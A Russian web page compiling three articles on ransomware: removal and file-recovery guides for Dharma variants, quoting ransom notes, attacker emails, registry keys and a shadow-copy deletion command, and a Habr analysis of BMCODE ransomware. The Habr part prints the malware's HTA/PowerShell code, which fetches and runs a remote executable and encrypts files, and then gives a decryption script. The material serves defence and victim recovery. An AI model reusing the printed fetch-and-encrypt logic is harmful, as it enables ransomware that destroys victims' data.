Email support decrypt files info

Содержание

Удаление decrypthelp@qq.com и восстановление зашифрованных файлов .java – Интернет безопасность по-русски

Email support decrypt files info

decrypthelp@qq.com (decrypthelp2@qq.com) – электронная почта злоумышленников, которые распространяют одну из модификаций шифровальщика Dharma ransomware.

Так же злоумышленники могут использовать почтовые ящики udacha@cock.li, sabantui@tutanota.com, writeemaildecrypthelp@qq.com, ordecrypthelp2@qq.com,  habibi.habibi3@aol.com и ricky.martirosyan@aol.com.

Вирус шифрует более 40 типов самых распространенных типов файлов и распространяется по локальной сети.

Методы заражения преимущественно стандартные для шифровальщиков – пользователь сам загружает его в систему, так как исполнительный файл маскируется злоумышленниками под уведомления из банков, налоговых и других государственных органов, а так же как письма от клиентов и контрагентов.

После полного шифрования всех файлов, вирус “раскидывает” файлы FILES ENCRYPTED.txt и Info.hta на рабочем столе и в папках с закодированными файлами.

Шифровальщик добавляет к именам зашифрованных файлов разные расширения, в последней версии это “.java“.

В файле FILES ENCRYPTED.txt  содержится следуюющая информация:

all your data has been locked usYou want to return?

write email sabantui@tutanota.com or udacha@cock.li

В файле Info.hta более детальные “инструкции”:

All your files have been encrypted!All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail sabantui@tutanota.comWrite this ID in the title of your message B8F053ECIn case of no answer in 24 hours write us to theese e-mails:udacha@cock.

liYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.Free decryption as guaranteeBefore paying you can send us up to 5 files for free decryption.

The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)How to obtain BitcoinsThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click ‘Buy bitcoins’, and select the seller by payment method and price.

https://localbitcoins.com/buy_bitcoins

Also you can find other places to buy Bitcoins and beginners guide here:

How Can I Buy Bitcoin?

Attention!Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.

Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

На сегодняшний день практически не существует возможности РАСШИФРОВАТЬ зашифрованные файл, так как хакеры используют стойкий к расшифровке алгоритм AES.

В то же время мы крайне не рекомендуем платить выкуп за расшифровку файлов, так как известны случаи когда злоумышленники переставали выходить на связь после оплаты.

В то же время существует ряд способов восстановить зашифрованную информацию используя скрытые возможности ОС Windows и специальные программные комплексы.

Удалить шифровальщик decrypthelp@qq.com с помощью автоматического чистильщика

Исключительно эффективный метод работы со зловредным ПО вообще и программами-вымогателями в частности.

Использование зарекомендовавшего себя защитного комплекса гарантирует тщательность обнаружения любых вирусных компонентов, их полное удаление одним щелчком мыши.

Обратите внимание, речь идет о двух разных процессах: деинсталляции инфекции и восстановления файлов на Вашем ПК. Тем не менее, угроза, безусловно, подлежит удалению, поскольку есть сведения о внедрении прочих компьютерных троянцев с ее помощью.

Восстановить доступ к зашифрованным файлам

Как было отмечено, программа-вымогатель decrypthelp@qq.

com блокирует файлы с помощью стойкого алгоритма шифрования, так что зашифрованные данные нельзя возобновить взмахом волшебной палочки – если не принимать в расчет оплату неслыханной суммы выкупа.

Но некоторые методы действительно могут стать палочкой-выручалочкой, которая поможет восстановить важные данные. Ниже Вы можете с ними ознакомиться.

Программа автоматического восстановления файлов (дешифратор)

Известно весьма неординарное обстоятельство. Данная инфекция стирает исходные файлы в не зашифрованном виде. Процесс шифрования с целью вымогательства, таким образом, нацелен на их копии.

Это предоставляет возможность таким программным средствам как Data Recovery Pro восстановить стертые объекты, даже если надежность их устранения гарантирована.

Настоятельно рекомендуется прибегнуть к процедуре восстановления файлов, ее эффективность не вызывает сомнений.

Загрузить программу восстановления данных Data Recovery Pro

Теневые копии томов

В основе подхода предусмотренная Windows процедура резервного копирования файлов, которая повторяется в каждой точке восстановления. Важное условие работы данного метода: функция “Восстановление системы” должна быть активирована до момента заражения. При этом любые изменения в файл, внесенные после точки восстановления, в восстановленной версии файла отображаться не будут.

  • Использовать опцию “Предыдущие версии”. В диалоговом окне “Свойства” любого файла есть вкладка Предыдущие версии. Она показывает версии резервных копий и дает возможность их извлечь. Итак, выполняем щечек правой клавишей мыши по файлу, переходим в меню Свойства, активируем необходимую вкладку и выбираем команду Копировать или Восстановить, выбор зависит от желаемого места сохранения восстановленного файла.
  • Использовать “теневой проводник” ShadowExplorer. Вышеописанный процесс можно автоматизировать с помощью инструмента под названием Shadow Explorer. Он не выполнят принципиально новой работы, но предлагает более удобный способ извлечения теневых копий томов. Итак, скачиваем и устанавливаем прикладную программу, запускаем и переходим к файлам и папкам, предыдущие версии которых следует восстановить. Чтобы выполнить процедуру, щелкните любой объект правой клавишей мыши и выберите команду Экспорт (Export).

Резервное копирование

Это самый лучший среди всех не связанных с выкупом способов.

Если процедура резервного копирования данных на внешний сервер применялась до момента атаки программы-вымогателя на Ваш компьютер, для восстановления зашифрованных файлов понадобиться попросту войти в соответствующий интерфейс, выбрать необходимые файлы и запустить механизм восстановления данных из резерва. Перед выполнением операции необходимо удостовериться, что вымогательское ПО полностью удалено.

Проверить возможное наличие остаточных компонентов вымогателя decrypthelp@qq.com

Очистка в ручном режиме чревата упущением отдельных фрагментов вымогательского ПО, которые могут избежать удаления в виде скрытных объектов операционной системы или элементов реестра.

Чтобы исключить риск частичного сохранения отдельных зловредных элементов, выполните сканирование Вашего компьютера с помощью надежного защитного программного комплекса, специализирующегося на зловредном ПО.

Загрузить программу для удаления вируса decrypthelp@qq.com

Похожее

Источник: https://itsecurity-ru.com/viruses/decrypthelp-qq-com

Как удалить Dharma-Frend Ransomware и расшифровать файлы .frend | Баги Истребитель

Email support decrypt files info

Программа-вымогатель Dharma-Frend типичное разветвление Crysis-Dharma-Cezar семейство вирусов-вымогателей. Этот конкретный вариант добавляет .frend расширение для зашифрованных файлов и делает их непригодными для использования.

Dharma-Frend Ransomware не имеет эффективного дешифратора, однако мы рекомендуем вам попробовать инструкции ниже, чтобы попытаться восстановить ваши файлы.

Dharma-Frend Ransomware добавляет суффикс, который состоит из нескольких частей, таких как: уникальный идентификатор пользователя, адрес электронной почты разработчика и .frend суффикс. Шаблон имени файла после шифрования выглядит так: файл с именем xnumx.

doc будут преобразованы в 1.doc.id- {8-значный-id}. [{Email-address}]. Frend. Вот список расширений, обнаруженных на ID-Вымогатели на данный момент:

  • .id- {id}. [undogdianact1986@aol.com] .frend

После завершения шифрования вирус создает 2 текстовых файла (записки о выкупе): ФАЙЛЫ ЗАШИФРОВАНЫ.TXT а так же Info.hta в папках с зашифрованными файлами и на рабочем столе. Файлы содержат информационное сообщение и инструкции по оплате выкупа. Info.hta имеет следующее содержание:

All your files have been encrypted!All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail undogdianact1986@aol.comWrite this ID in the title of your message *********In case of no answer in 24 hours write us to theese e-mails: undogdianact1986@aol.

comYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.Free decryption as guaranteeBefore paying you can send us up to 1 file for free decryption.

The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)How to obtain BitcoinsThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.

hxxps://localbitcoins.com/buy_bitcoinsAlso you can find other places to buy Bitcoins and beginners guide here:hxxp://www.coindesk.com/information/how-can-i-buy-bitcoins/Attention!Do not rename encrypted files.Do not try to decrypt your data using third party software, it may cause permanent data loss.

Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

ФАЙЛЫ ЗАШИФРОВАНЫ.TXT это короткий текстовый файл, который побуждает пользователей обращаться к хакерам с таким сообщением:

all your data has been locked usYou want to return?

write email undogdianact1986@aol.com

Авторы Dharma-Frend Ransomware вымогают у жертв выкуп в размере 10000 долларов. Использование криптовалюты и платежных сайтов на базе TOR делает невозможным отслеживание злоумышленников. Кроме того, жертвы таких вирусов часто становятся жертвами мошенничества, и злоумышленники не отправляют ключи даже после уплаты выкупа.

К сожалению, ручное или автоматическое дешифрование невозможно, если программа-вымогатель не была разработана с ошибками или не имела определенных ошибок выполнения, недостатков или уязвимостей. Не рекомендуем платить злоумышленникам деньги.

Часто по прошествии некоторого времени специалисты по безопасности из антивирусных компаний или отдельные исследователи декодируют алгоритмы и выпускают ключи дешифрования. Некоторые файлы можно восстановить с помощью резервных копий, теневых копий, предыдущих версий файлов или программного обеспечения для восстановления файлов.

Прочтите эту статью и используйте инструкции на этой странице, чтобы легко удалить Dharma-Frend Ransomware и расшифровать файлы .frend в Windows 10, 8, 7.

Как Dharma-Frend Ransomware заразил ваш компьютер

Dharma-Frend Ransomware использует рассылку спама с вредоносными вложениями .docx. Такие вложения содержат вредоносные макросы, которые запускаются, когда пользователь открывает файл. Этот макрос загружает исполняемый файл с удаленного сервера, который, в свою очередь, запускает процесс шифрования.

Вирус также может использовать службы удаленного рабочего стола для проникновения на компьютеры жертвы. Важно знать, что эта программа-вымогатель может шифровать подключенные сетевые диски, общие диски хостов виртуальных машин и несопоставленные сетевые ресурсы. Необходимо контролировать доступ к сетевым ресурсам.

После шифрования теневые копии файлов удаляются командой: vssadmin.exe vssadmin удалить тени / все / тихо. Вирус присваивает жертвам определенный идентификатор, который используется для именования этих файлов и, предположительно, для отправки ключа дешифрования.

Чтобы не допустить заражения этим типом угроз в будущем, рекомендуем использовать SpyHunter 5 а так же BitDefender Anti-Ransomware.

Скачать утилиту для удаления Dharma-Frend Ransomware

Скачать утилиту для удаления

Чтобы полностью удалить Dharma-Frend Ransomware, мы рекомендуем вам использовать WiperSoft AntiSpyware от WiperSoft. Он обнаруживает и удаляет все файлы, папки и ключи реестра Dharma-Frend Ransomware.

Как удалить Dharma-Frend Ransomware вручную

Не рекомендуется удалять Dharma-Frend Ransomware вручную, для более безопасного решения используйте вместо этого Инструменты для удаления.

Файлы Dharma-Frend Ransomware:

Info.hta{randomfilename}.exeFILES ENCRYPTED.txtUnlockUnlock.exe

1BULD_0611.EXE

Ключи реестра Dharma-Frend Ransomware:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “filename.exe” = %UserProfile%\AppData\Roaming\{randomfilename}.exeHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “filename.exe” = %UserProfile%\AppData\Roaming\{randomfilename}.

exeHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “mshta.exe “%UserProfile%\AppData\Roaming\Info.hta”” = mshta.exe “%UserProfile%\AppData\Roaming\Info.hta”

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “mshta.exe “C:\Windows\System32\Info.hta”” = “mshta.

exe “C:\Windows\System32\Info.hta””

Используйте автоматические дешифраторы

Используйте следующий инструмент от Kaspersky под названием Rakhni Decryptor, который может расшифровать файлы .frend. Загрузите его здесь:

Скачать RakhniDecryptor

Нет никакой цели платить выкуп, потому что нет гарантии, что вы получите ключ, но вы подвергнете риску свои банковские данные.

Если вы заражены Dharma-Frend Ransomware и удалили его со своего компьютера, вы можете попытаться расшифровать свои файлы. Поставщики антивирусов и частные лица создают бесплатные дешифраторы для некоторых крипто-шкафчиков. Чтобы попытаться расшифровать их вручную, вы можете сделать следующее:

Используйте Stellar Phoenix Data Recovery Pro для восстановления файлов .frend

  1. Скачать Звездный Феникс Восстановление Данных Pro.
  2. Выберите место для поиска потерянных файлов и нажмите Просканировать кнопку.
  3. Подожди пока САЙТ а так же Deep сканирование закончено.
  4. Предварительный просмотр найденных файлов и их восстановление.

Использование опции предыдущих версий файлов в Windows:

  1. Щелкните на зараженный файл правой кнопкой мыши и выберите Свойства.
  2. Выберите Предыдущие версии меню.

  3. Выберите конкретную версию файла и нажмите Копировать.
  4. Чтобы восстановить выбранный файл и заменить существующий, нажмите на Восстановить кнопку.

  5. Если в списке нет элементов, выберите альтернативный метод.

Использование Shadow Explorer:

  1. Скачать Shadow Explorer программу.
  2. Запустите ее, и вы увидите на экране список всех дисков и даты создания теневых копий.
  3. Выберите диск и дату, с которой вы хотите восстановить.
  4. Щелкните правой кнопкой мыши на имя папки и выберите Экспортировать.
  5. Если в списке нет других дат, выберите альтернативный метод.

Если вы используете Dropbox:

  1. Войдите на сайт DropBox и перейдите в папку, содержащую зашифрованные файлы.
  2. Щелкните правой кнопкой мыши на зашифрованный файл и выберите Предыдущие версии.
  3. Выберите версию файла, которую хотите восстановить, и нажмите на Восстановить кнопку.

Используйте Bitdefender Anti-Ransomware

Известный поставщик антивирусов BitDefender выпустил бесплатный инструмент, который поможет вам с активной защитой от программ-вымогателей в качестве дополнительного щита к вашей текущей защите.

Он не будет конфликтовать с более крупными приложениями безопасности. Если вы ищете комплексное решение для интернет-безопасности, рассмотрите обновление до полной версии BitDefender Internet Security 2018.

Скачать BitDefender Anti-Ransomware

2. Создайте резервную копию файлов

Независимо от успеха защиты от программ-вымогателей, вы можете сохранить свои файлы с помощью простого онлайн-резервного копирования. Облачные сервисы сейчас довольно быстрые и дешевые.

Более разумно использовать онлайн-резервное копирование, чем создавать физические диски, которые могут быть заражены и зашифрованы при подключении к ПК или повреждены при падении или ударе. Пользователи Windows 10 и 8 / 8.1 могут найти предустановленное решение для резервного копирования OneDrive от Microsoft.

На самом деле это одна из лучших служб резервного копирования на рынке с разумными ценами. Пользователи более ранних версий могут с ним ознакомиться здесь, . Обязательно сделайте резервную копию и синхронизируйте наиболее важные файлы и папки в OneDrive.

3. Не открывайте спам-сообщения и защищайте свой почтовый ящик

Вредоносные вложения в спам или фишинговые сообщения электронной почты – самый популярный способ распространения программ-вымогателей.

Использование спам-фильтров и создание правил защиты от спама – является хорошей практикой. MailWasher Pro – один из мировых лидеров в области защиты от спама.

Он работает с различными настольными приложениями и обеспечивает очень высокий уровень защиты от спама.

Скачать MailWasher Pro

Источник: https://www.bugsfighter.com/ru/remove-dharma-frend-ransomware-and-decrypt-frend-files/

PowerShell. Дешифруем файлы после воздействия «вируса»

Email support decrypt files info

В неком городе России (Может быть, что даже в вашем) Есть не маленькая фирма. Арендует помещенье

У НИИморгорворпрома.

В этой фирме есть сотрудник, почту любящий читать. Открывает как-то файл, кем-то вложенный нарочно, в недра письмеца пришедшего. Запустив без задней мысли «Благодарственное письмо.hta» и не увидев поздравления, покурить решил немного. Возвращаясь с перекура, он читает в беспокойстве: Если Вы читаете это сообщение, значит Ваш компьютер был атакован опаснейшим вирусом. Вся Ваша информация (документы, фильмы и другие файлы) на этом компьютере была зашифрована с помощью самого криптостойкого алгоритма в мире RSA1024. Восстановить файлы можно только при помощи специальной программы. Чтобы её получить, Вам необходимо написать нам письмо на адрес unblockme@tormail.org При попытке расшифровки без нашей программы файлы могут повредиться! К письму прикрепите файл, который находится на рабочем столе «READ_ME_NOW!!!!!!.TXT», либо этот файл Письма с угрозами будут угрожать только Вам и Вашим файлам! НЕ ЗАБУДЬТЕ: только МЫ можем расшифровать Ваши файлы!

pz8FkWJXdijcajJcWfhJ27TGPgcNNEKXDBcsdyzfX+lUoq68eAptVmGNIYLD8eti1kwicdOR59pwOC7XM7T+YLccqyeJqc5loxMCKy4pklzbMJBRm и т.д.

Теперь тоже самое другими словами. Сотруднику пришло письмо с вложением «Благодарственное письмо.rar» В теле письма указывалось что архив запаролен и давался пароль. Так уж совпало что в эти дни клиенты слали подобные письма и сотрудник ничего не заподозрил. Открыв архив и запустив вложение «Благодарственное письмо.hta». Через некоторое время почти все файлы приобрели расширение .BMCODE (дописалось в конец, не удаляя текст оригинального расширения) и в каждой папке лежала READ_ME_NOW!!!!!!.txt c указанным выше текстом. Пользователь сообщил «куда надо» и за дело взялись «кто надо». Первым делом без паники взглянули в это *.hta и увидели:

Оригинальный код здесь и далее немного изменён и закомментирован дабы не было случайных запусков.

Код hta Смотрим дальше (у отдела началась истерика от смеха насколько всё гениально и просто): Execute base64decode(a1686979793=1686979793: Const SYSTEM32 = &H25:Set# fso = CreateObject(“Scripting.FileSystemObject”):Set objShell = CreateObject(“Shell.Application”):Set wshShell = CreateObject( “WScript.Shell” ):#Set objFolder = objShell.Namespace(SYSTEM32):Set objFolderItem = objFolder.Self:filepath = replace(objHTA_Info.commandLine,chr(34),””):arguments = ” -command $path=((get-content -Path '” + filepath + “' -totalcount 1) -split '%'[1];#$bytes = [System.Convert]::FromBase64String($path);$decoded = [System.Text.Encoding]::UTF8.GetString($bytes);Invoke-Expression $decoded”:Path = objFolderItem.Path + “\WindowsPowerShell\v1.0\powershell.exe”:newPath = Path & arguments:RarPath = wshShell.ExpandEnvironmentStrings(“%TMP%”) & “\powershell.exe”:TestPath = wshShell.ExpandEnvironmentStrings(“%TMP%”) & “\powershell\powershell.exe”:.appNewPath = wshShell.ExpandEnvironmentStrings(“%TMP%”) & “\powershell\powershell.exe” & arguments:If (fso.FileExists(Path)) Then:wshShell.Run newPath, 0, False: Else : #If Not (fso.FileExists(TestPath)) Then: dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”): dim bStrm: Set bStrm = createobject(“Adodb.Stream”): xHttp.Open “GET”, “https://dl.dropbox.com/sh/wn8x35r9l9wsitn/XSwafOFh9E/powershell.exe?dl=1”, False: xHttp.Send: with bStrm: .type = 1: .open: #.write xHttp.responseBody: .savetofile RarPath, 2: end with: wshShell.Run RarPath, 0, True: End If : wshShell.Run appNewPath, 0, True :End If
Примерно поняв, что главное — выкачивается PowerShell с аккаунта на dropbox.com теряем интерес к этому куску. Далее: первый кусок в base64$1686979793=1686979793;$ErrorActionPreference=”SilentlyContinue”;if(((Get-Process -Name powershell).count) -ge 2){exit}$ref=[Reflection.Assembly]::LoadWithPartialName('System.Security'); Add-Type -Assembly System.Web;$ek=(get-wmiobject Win32_ComputerSystemProduct).UUID;[byte[]]$bytes=[system.Text.Encoding]::Unicode.GetBytes($ek);$basekey=”BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg==”;#$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider;#$rsa.ImportCspBlob([system.Convert]::FromBase64String($basekey));$enckey=[system.Convert]::ToBase64String($rsa.Encrypt($bytes, $false));$text= “Если Вы читаете это сообщение, значит Ваш компьютер был атакован опаснейшим вирусом.`r`nВся Ваша информация (документы, фильмы и другие файлы) на этом компьютере была зашифрована`r`nс помощью самого криптостойкого алгоритма в мире RSA1024.`r`nВосстановить файлы можно только при помощи специальной программы. Чтобы её получить, Вам необходимо`r`nнаписать нам письмо на адрес unblockme@tormail.org`r`nПри попытке расшифровки без нашей программы файлы могут повредиться!`r`nК письму прикрепите файл, который находится на рабочем столе `”READ_ME_NOW!!!!!!.TXT`”, либо этот файл`r`nПисьма с угрозами будут угрожать только Вам и Вашим файлам! НЕ ЗАБУДЬТЕ: только МЫ можем расшифровать Ваши файлы!`r`n`r`n” + $enckey; #function Encrypt-File($item, $Passphrase){$salt=”BMCODE hack your system”;$init=”BMCODE INIT”;$r = new-Object System.Security.Cryptography.RijndaelManaged;$pass = [Text.Encoding]::UTF8.GetBytes($Passphrase);$salt = [Text.Encoding]::UTF8.GetBytes($salt);$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1″, 5).GetBytes(32);$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15];$r.Padding=”Zeros”;$r.Mode=”CBC”;$c = $r.CreateEncryptor();$ms = new-Object IO.MemoryStream;$cs = new-Object Security.Cryptography.CryptoStream $ms,$c,”Write”;$cs.Write($item, 0,$item.Length);$cs.Close();$ms.Close();$r.Clear();return $ms.ToArray();} #$disks=Get-PSDrive|Where-Object {$_.Free -gt 50000}|Sort-Object -Descending; foreach($disk in $disks){gci $disk.root -Recurse -Include “*.doc”,Неприлично много форматов,”*.1cd” |%{try {$file=[io.file]::Open($_, Open', 'ReadWrite'); #if ($file.Length -lt “40960”){$size=$file.Length}else{$size=”40960″}[byte[]]$buff = new-object byte[] $size;$ToEncrypt = $file.Read($buff, 0, $buff.Length);$file.Position='0';#$Encrypted=Enckrypt-File $buff $ek;$file.Write($Encrypted, 0, $Encrypted.Length);$file.Close();#$newname=$_.Name+'.BMCODE';#ren -Path $_.FulName -NewName $nename -Force;$path=$_.DirectoryName+'\READ_ME_NOW!!!!!!.TXT';if(!(Test-Path $path)){sc -pat $path -va $text}}catch{}}} Читаем, читаем и облегчённо выдыхаем. Ни о каком тотальном шифровании файлов речи не идёт. Итак. Первым делом ищем ключи. Видим строки: $Encrypted=Enckrypt-File $buff $ek; $ek=(get-wmiobject Win32_ComputerSystemProduct).UUID; и понимаем, что для ключа используется UUID компьютера. С этого момента становится ещё легче и почти смело забываем про первую часть, где формируется страшный ключ, который добавляется в *.TXT Далее видим:if ($file.Length -lt “40960”){$size=$file.Length}else{$size=”40960″}; [byte[]]$buff = new-object byte[] $size; Из этого выясняем, что шифруется не весь файл, а только первая его часть если размер файла больше 40кб, если меньше, то весь файл. Остается узнать UUID компьютера и написать скрипт для дешифровки. UUID узнаем той же командой(get-wmiobject Win32_ComputerSystemProduct).UUID Запустив в PowerShell, который зловред заботливо закачал и не удалил из %TEMP%. Теперь за написание скрипта. Сложность возникла только в понимании (и то из-за нехватки знаний, т.к. не приходилось раньше сталкиваться), что по примерам у M$ подобные функции передают в качестве параметра строку, а тут используют просто массив.

Собственно, что поучилось. Данный код — рабочий, без изменений и с лишними выводами для отслеживания процесса работы.

DEC_beta,ps1cls$null = [Reflection.Assembly]::LoadWithPartialName(“System.Security”); $ek='00000000-0000-0000-0000-6CF04916E0EA'; function Decrypt-String($Encrypted, $Passphrase){ $salt=”BMCODE hack your system” $init=”BMCODE INIT” $r = new-Object System.Security.Cryptography.RijndaelManaged $pass = [Text.Encoding]::UTF8.GetBytes($Passphrase) $salt = [Text.Encoding]::UTF8.GetBytes($salt) $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1″, 5).GetBytes(32) $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15] $r.Padding=”Zeros”; $r.Mode=”CBC”; $d = $r.CreateDecryptor() $ms = new-Object IO.MemoryStream @(,$Encrypted) $cs = new-Object Security.Cryptography.CryptoStream $ms,$d,”Read” $Enc=$cs.read($Encrypted, 0,$Encrypted.Length) $cs.Close(); $ms.Close(); $r.Clear(); return [byte[]]$Encrypted = $ms.ToArray()} $dir= read-host “Введите полный пусь к папке или диску (Примеры: C:\, D:\111\)” gci $dir -Recurse -Include “*.BMCODE” |%{try {$_;$file=[io.file]::Open($_, 'Open', 'ReadWrite');#Wrire-host $file.Name;write-Host “Размер файла: $file.Length”;If ($file.Length -lt “40960”){$size=$file.Length}Else{$size=”40960″}[byte[]]$buff = new-object byte[] $size;$ToEncrypt = $file.Read($buff, 0, $buff.Length);write-host $size;$file.Position='0'; $arr=Decrypt-String $buff $ek;Write-host $_.NameWrite-host $_.FullName $file.Write($arr, 0, $arr.Length);Write-host “Done”;$file.Close();$newname=$_.Name -replace '.BMCODE',''; ren -Path $_.FullName -NewName $newname -Force;Write-Host “Новое имя: $_.Name”;$hnya=$_.DirectoryName+'\READ_ME_NOW!!!!!!.TXT'rm $hnya;}catch{}}
Что он делает, что надо изменить если понадобиться самим:
1)задаем в ручную переменную $ek c нужным ключом (в нашем случае UUID)
2)Описание функции декодирования, которая возвращает массив. Задаём переменные $salt и $init согласно тем, что были в исходном коде зловреда. 3)Просим запускающего указать путь, начиная с которого будет поиск файлов (ищем по вложенным папкам) 4)Каждый найденный фаил с указанным расширением (.BMCODE) декодируем и переименовываем в нормальный вид. 5)Попутно удаются файлы с именем READ_ME_NOW!!!!!!.TXT, которые насоздавал зловред. Код не идеален и многое можно упростить и переписать, но главное — он работает и помогает. Вот и всё. Надеюсь эта статья поможет всем кто уже столкнулся с подобной проблемой и не знает, что делать. Как пишут в рунете злоумышленники требуют за расшифровку от 3000 до 10000 руб, но и встречаются более сложные варианты зловредов, где просто так ключ уже не узнать. За сим прощаюсь и надеюсь, что всёже найду время и напишу как мы в своём НИИморгорворпроме устанавливали видео наблюдение и вешали мышку в качестве звонка на двери отдела.

UPD

По результатам переписки.
Вариант .TFCODE В варианте .TFCODE используется случайный пароль длиной 50 знаков. Файл с паролем был найден в C:\Documents and Settings\USER\Application Data. Фаил System Product Name В коде зловреда реализована своеобразная проверка на повторный запуск$idpath = $env:APPDATA + “\” + (gwmi win32_computersystem).model;if(Test-Path $idpath){$getc = Get-Content $idpath;if ($getc -eq “good”){exit} else {$ek = $getc}}……Set-Content -Path $idpath -Value “good”

Если в файл уже записано good значит ключ уже так просто не найти. Так, что если случайно запустили зловреда или заметили, что файлы начали менять расширения, немедленно выключайте компьютер, чтобы остановить процесс шифровки и сохранить ключ.

Остальное всё тоже самое. В переменную $ek ставим строку из найденного файла. Меняем .BMCODE на .TFCODE, проверяем переменные $salt и $init и изменяем название *.TXT на то, что насоздавалось в папках (READ_ME_NOW.TXT).

Делаем пробный запуск на копиях зашифрованных фалов. Если всё хорошо, то радуемся.

  • PowerShell
  • Вирусы
  • Криптография

Хабы:

  • Информационная безопасность
  • Программирование

Источник: https://habr.com/ru/post/168677/

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.